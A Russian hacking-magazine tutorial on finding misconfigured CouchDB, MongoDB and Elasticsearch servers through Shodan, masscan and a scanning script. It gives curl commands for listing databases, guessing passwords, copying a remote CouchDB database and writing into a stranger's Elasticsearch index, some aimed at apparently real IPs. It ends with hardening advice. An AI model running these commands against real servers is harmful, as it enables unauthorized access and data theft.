Хакер - В поисках утечек. Как хакеры ищут и угоняют чужие базы данных
hacker_frei
Михаил Артюхин
Содержание статьи
- Самые интересные СУБД
- CouchDB
- MongoDB
- Elasticsearch
- Примеры ручного поиска
- Разбор полетов
- Автоматизация
- Выводы
Практически каждый день «Хакер» пишет о масштабных и не очень утечках данных. «Течет» откуда только можно, и последствия бывают самыми разными. Сегодня я постараюсь рассказать и показать, как легко злоумышленники могут получить доступ к обширным массивам всевозможных данных.
WARNING
Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи. Неправомерный доступ к компьютерной информации преследуется по закону.
Прежде чем приступать к атакам, предлагаю разобраться, почему они вообще возможны и почему жизнь по‑прежнему ничему не учит админов и прочих причастных к защите БД.
- Порог вхождения в применение современных БД, как и в IT в целом, снижается. Начинающему эникейщику все проще попасть на администрирование сервиса, требующего тщательной и внимательной настройки, да и элементарных знаний о конкретном продукте. К счастью таких «инженеров», но к сожалению владельцев утекших данных, многие сетевые сервисы (например, базы данных) можно развернуть «в один клик». При этом совершенно не требуется понимать механизм работы и возможные угрозы развертываемым сервисам. И хорошо, если свежеустановленная база данных настраивалась хотя бы по инструкции с первой страницы поисковика. А если нет?
- Частенько авторизацию отключают по соображениям «удобства» работы с данными. В итоге наружу торчит порт, а нередко и интерфейс СУБД, с которым можно делать что угодно. Приходи — бери что хочешь…
- Начальство требует сделать все максимально дешево, так как денег мало и тратить их на достойного спеца не хочется. Вот и просят дизайнера Ваську накатить и настроить БД для компании за чашку кофе. Какая уж тут безопасность — хорошо, если хоть пароль поставит.
Таким образом, одной из основных причин утечки данных служит криворукость администраторов небезопасная конфигурация СУБД, оставленная в результате невнимательности или же просто недостатка знаний.
WWW
Пугающие масштабы криворукости админов и примеры утечек из‑за этого можно увидеть на канале «Утечки информации», да и в «Хакере» мы о них регулярно пишем.
САМЫЕ ИНТЕРЕСНЫЕ СУБД
СУБД — это система управления базами данных, которая обеспечивает механизм хранения и поиска этих самых данных. В дальнейшем я буду часто использовать это сокращение.
CouchDB
CouchDB — это база данных с открытым исходным кодом, разработанная программным фондом Apache. Классическая NoSQL-база. Написана на языке Erlang.
Больше всего нас интересуют способы подключения:
- порт HTTP API (по умолчанию — 5984);
- веб‑интерфейс Futon.
Доступ к БД реализован по протоколу HTTP с использованием JSON API, что позволяет обращаться к данным в том числе из выполняемых в браузере веб‑приложений. Имеет свой собственный графический веб‑интерфейс (Futon).
Мы же воспользуемся обычным curl. Вот, к примеру, запрос приветствия:
curl http://127.0.0.1:5984/
Ответ расскажет нам о номере версии, имени поставщика и версии программного обеспечения:
{
"couchdb":"Welcome","version":"2.3.1",
"git_sha":"c298091a4",
"uuid":"777dc19849f3ff0392ba09dec1a62fa7",
"features":["pluggable-storage-engines","scheduler"],
"vendor":{"name":"The Apache Software Foundation"}
}
Чтобы получить список всех БД на сервере, можно выполнить такой запрос:
curl http://127.0.0.1:5984/_all_dbs
В ответ мы увидим
[
"_replicator",
"_users",
"mychannel_",
"mychannel_kizuna-chaincode",
"mychannel_lscc",
"mychannel_user"
]
Здесь _replicator и _users — это стандартные БД.
В ответ также можно получить такую ошибку:
{
"error":"unauthorized",
"reason":"You are not a server admin."
}
Смело идем мимо, здесь ловить нечего. Уровень анонимного доступа настроен так, что мы не можем даже увидеть список БД на сервере, не то что к ним подключиться. Но можно попробовать наудачу подобрать пароль. Запрос на авторизацию выглядит следующим образом:
curl -X PUT http://localhost:5984/test -u "login:password"
Чтобы подключиться к графическому интерфейсу, нет необходимости ставить какое‑либо ПО, достаточно просто в браузере перейти по такому адресу:
http://127.0.0.1:5984/_utils/
Чтобы унести данные, можно воспользоваться следующим запросом:
curl -X POST -d '{"source":"http://54.161.77.240:5984/klaspadchannel_","target":"http://localhost:5984/klaspadchannel_"}' http://localhost:5984/_replicate -H "Content-Type: application/json"
Конечно же, потребуется поднять сервер CouchDB на локальной машине. Впрочем, было бы странно, если бы его у тебя не было, раз уж ты собрался работать с этой базой.
MongoDB
MongoDB — это кросс‑платформенная, документоориентированная база данных, которая обеспечивает высокую производительность и легкую масштабируемость. В основе данной БД лежит концепция коллекций и документов. Способов подключения опять два:
- HTTP API (порт по умолчанию — 27017);
- клиент Robo 3T.
Получить минимальную информацию о находке можно простым GET-запросом на порт API.
curl -X GET http://114.116.117.104:27017
Сведения здесь и правда скромные, без драйвера БД не удастся добыть хоть сколько‑нибудь полезные данные, кроме того, что БД здесь вообще присутствует (или нет).
Если на порте крутится действительно MongoDB, то ответ придет таким:
It looks like you are trying to access MongoDB over HTTP on the native driver port.
Этого вполне достаточно, чтобы продолжить ручную проверку при помощи графического клиента.
Унести данные из находки можно через GUI.
Elasticsearch
Elasticsearch — это представитель кластерных NoSQL баз данных, имеющий JSON REST API и использующий Lucene для полнотекстового поиска. Написана на Java. Мы будем рассматривать его как хранилище документов в формате JSON.
База Elasticsearch способна масштабироваться до петабайт структурированных и неструктурированных данных. Данные в индексе разделены на один или несколько осколков (шардов). Благодаря разделению Elasticsearch может масштабироваться и достигать размеров, которые не потянула бы одна машина. Elasticsearch — это распределенная система, описать максимальные объемы хранения данных затруднительно, могу сказать только, что там могут лежать петабайты и больше.
Способы подключения следующие:
- HTTP API (порт по умолчанию — 9200);
- графический клиент Kaizen, который можно взять на официальном сайте.
HTTP API — штука очень простая. Для начала давай запросим приветствие. Ради безопасности подопытного сервера часть адреса замазана:
curl -XGET http://47.99.Х.Х:9200/
Если все хорошо и мы правда нашли «Эластик», то в ответ придет что‑то подобное:
{
"name" : "node-2",
"cluster_name" : "es",
"cluster_uuid" : "q10ZJxLIQf-ZRZIC0kDkGQ",
"version" : {
"number" : "5.5.1",
"build_hash" : "19c13d0",
"build_date" : "2017-07-18T20:44:24.823Z",
"build_snapshot" : false,
"lucene_version" : "6.6.0"
},
"tagline" : "You Know, for Search"
}
Выведем список всех индексов в БД:
curl -XGET http://47.99.Х.Х:9200/_cat/indices?v
Ответ получим примерно такой.
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open bdp-interface x3DLdQRyTK2jssMvIJ3FmA 5 1 32576 28 428.9mb 214.4mb
green open onair-vlog Vsq0srUGSk2NvvYmXpxMBw 5 1 22 0 931.9kb 465.9kb
green open meizidb PCybF4SvTdSt1BoOCYLxNw 5 1 5328 1 27.9mb 13.9mb
green open rms-resource R6c3U5_pQgG71huRD0OdDA 5 1 125827 36 1.2gb 636.2mb
Узнаем названия полей, которые хранятся в БД:
curl -XGET http://47.99.X.X:9200/meizidb
Ответ:
{
"meizidb":{
"aliases":{},
"mappings":{
"assets":{
"dynamic_templates":[{"string":{
"match_mapping_type":"string",
"mapping":{"type":"keyword"}
}}],
"properties":{
"annexList":{
"properties":{
"annexFileId":{"type":"keyword"},
"annexName":{"type":"keyword"},
"annexSize":{"type":"long"},
"annexThumbUrl":{"type":"keyword"},
"annexType":{"type":"keyword"},
"annexUrl":{"type":"keyword"}
}
},
"appCode":{"type":"keyword"},
"asrText":{"type":"text","index_options":"offsets","analyzer":"ik_max_word"},
"assetsType":{"type":"keyword"},
"cdetail":{
"properties":{
"SP":{"type":"keyword"},
"jz":{"type":"keyword"},
"src":{"type":"keyword"},
"tag":{"type":"keyword"},
"type":{"type":"keyword"}
}
},
"companyId":{"type":"keyword"},
"companyName": ...
}
Можно и вносить записи. Но я настоятельно не рекомендую, так как без договора с владельцем сервера это может повлечь тяжкие последствия.
curl -X POST http://47.99.Х.Х:9200/onair-vlog/catalogue/1 -H 'Content-Type: application/json' -d @- << EOF
{
"username" : "KassNT",
"subject" : "My Referal url: ",
"referal" : "https://xakep.ru/paywall/form/?init&code=xakep-promo-KassNT"
}
EOF
ПРИМЕРЫ РУЧНОГО ПОИСКА
Существуют два пути поиска подопытных.
Первый путь — онлайновые сервисы, которые сканируют весь мир и предоставляют нам информацию о хостах при помощи поисковых операторов. Можно, например, «просто найти» цель в одном из них.
Показывать каждый подробно я не буду, но приведу несколько примеров. Например, запрос на поиск MongoDB для сервиса Fofa будет выглядеть так.
Подобный ему сервис — Zoomeye.org. Запрос на поиск хостов с поднятой CouchDB здесь будет выглядеть также несложно.
Продемонстрирую результаты работы сервиса Shodan с помощью одноименной консольной утилиты. Результат поиска по запросу [product:mongodb all:"metrics"] будет как на скрине ниже.
Второй путь — применить ручные сканеры.
- Nmap
- Masscan
- Zmap из пакета утилит Zmap.io
- Sonar Project
- Что‑то свое
Сканирование, конечно, ручное, но почему бы не воспользоваться готовым набором данных? Например, если VPS-провайдер не позволяет сканировать все подряд на огромной скорости, то эти ребята уже сделали все за вас! Ну, почти.
О Project Sonar слышало не так много людей. Это исследовательский проект, который сканирует сервисы и протоколы, чтобы получить представление о глобальном воздействии распространенных уязвимостей. Разработан в компании, создавшей, надеюсь, небезызвестный тебе Metasploit Framework, — Rapid7. Собранные данные доступны широкой публике для исследований в области безопасности.
Нам будет интересен раздел TCP Scans, где содержатся результаты опроса IP-адресов по различным портам. Подойдет, например, набор данных по результатам 9200 порта (Elasticsearch).
TCP Scans
[2020-10-07-1602049416-http_get_9200.csv.gz] [39.9 MB] [October 7, 2020]
Lines: 3 472 740
[ 'timestamp_ts' , 'saddr' , 'sport' , 'daddr' , 'dport' , 'ipid' , 'ttl' ]
'1602049426' , '146.148.230.26' , '9200' , '71.6.233.15' , '9200' , '54321' , '248'
'1602049426' , '34.102.229.177' , '9200' , '71.6.233.70' , '9200' , '60681' , '122'
'1602049426' , '104.232.64.108' , '9200' , '71.6.233.105' , '9200' , '54321' , '248'
'1602049426' , '164.116.204.58' , '9200' , '71.6.233.79' , '9200' , '38329' , '242'
'1602049426' , '35.186.233.76' , '9200' , '71.6.233.7' , '9200' , '44536' , '122'
'1602049426' , '192.43.242.72' , '9200' , '71.6.233.113' , '9200' , '19234' , '56'
'1602049426' , '166.241.202.174' , '9200' , '71.6.233.47' , '9200' , '26802' , '242'
'1602049426' , '142.92.75.134' , '9200' , '71.6.233.115' , '9200' , '28081' , '243'
'1602049426' , '198.86.33.87' , '9200' , '71.6.233.112' , '9200' , '17403' , '59'
Для Masscan составим такую команду на запуск:
masscan -p9200,9042,5984,27017 10.0.0.0/8 --echo > result.txt
Имея на руках готовый список хостов, можно приступить к детальной проверке.
Здесь видно, что порт не просто открыт — на нем запущен сервис Elasticsearch.
В результате сканирования и поиска разными сервисами было обнаружено немало любопытного. На скринах — небольшая выборка.
Неожиданно обнаружились списки имен, ников, фамилий (со ссылкой на конкретный аккаунт Telegram, VK или Viber), 16 баз данных, в каждой 15–20 тысяч строк таких вот списков.
РАЗБОР ПОЛЕТОВ
Вот что в последнее время случается с теми, кто криво настраивает доступ к БД. Все данные отправляются на тот свет, а незадачливому админу остается только записка с требованием выкупа.
Можно глянуть, кто и что творил с данными, при помощи команды show log.
Как видно, все довольно просто: зашли, стерли данные, повесили свой README.
Прочитав логи, легко можно увидеть, что «записка о выкупе» перезаписывалась много раз. Каждый раз, когда очередной злодейский бот находит открытую базу, записка просто меняется на новую.
Бот проверяет возможность авторизации и записи, после чего дропает все данные, оставляя памятку скорбящему владельцу.
Данные, конечно, никто не возвращает и даже не бэкапит перед уничтожением, как красиво расписано в тексте. Здесь надеяться на честность преступника, к сожалению, бесполезно.
АВТОМАТИЗАЦИЯ
Чтобы быстрее искать СУБД, я написал небольшой скрипт, который работает со списками в формате [ip]:[port]. Вот что он делает:
- открывает на чтение указанный файл;
- считывает строку
ip:portчерез разделитель в переменную; - обращается при помощи curl по HTTP к хосту из переменной;
- считывает
http_response, пришедший от хоста (время ответа хоста ограничено в моем случае четырьмя секундами); - на основе полученного кода
http_responseхост сохраняется либо в «успешные», либо в «мусорку».
Действия совершаются циклически, пока не закончится входной файл.
echo "$LINE" | cut -d":" -f'1 2';
HTTP_CODE=$(curl --write-out "%{http_code}n" "http://"$LINE"" --output output.txt --silent --connect-timeout 4)
if (("$HTTP_CODE"=="200")); then
echo "##########################--HTTP_API_FOUND--#########################";
echo $LINE >> result.txt
else
echo "Tried to access it, but f'ed up";
echo $LINE >> trash_bin.txt
fi
Поскольку распространение таких скриптов может квалифицироваться как создание вредоносных программ, я привожу не совсем рабочий код. И тебе тоже рекомендую быть бдительным, если попробуешь написать что‑то в том же духе.
Как видишь, автоматизировать поиск целей и даже их дальнейшую «обработку» крайне легко.
ВЫВОДЫ
Я, конечно, рассмотрел далеко не все варианты, выбрав наиболее часто «текущие» СУБД. Но принцип, думаю, понятен: даже если ты админ, а не какой‑нибудь хакер, знать возможные векторы атак обязательно. Периодически сканируй свои серверы и будешь узнавать о дырах раньше, чем их найдут злоумышленники. Закрывай по умолчанию все ненужные порты. Прячь эндпоинты за авторизацией и генерируй надежные пароли. И, конечно, делай бекапы на случай, если твои данные все же найдет и уничтожит чей‑то бот.
Читайте ещё больше платных статей бесплатно: https://t.me/hacker_frei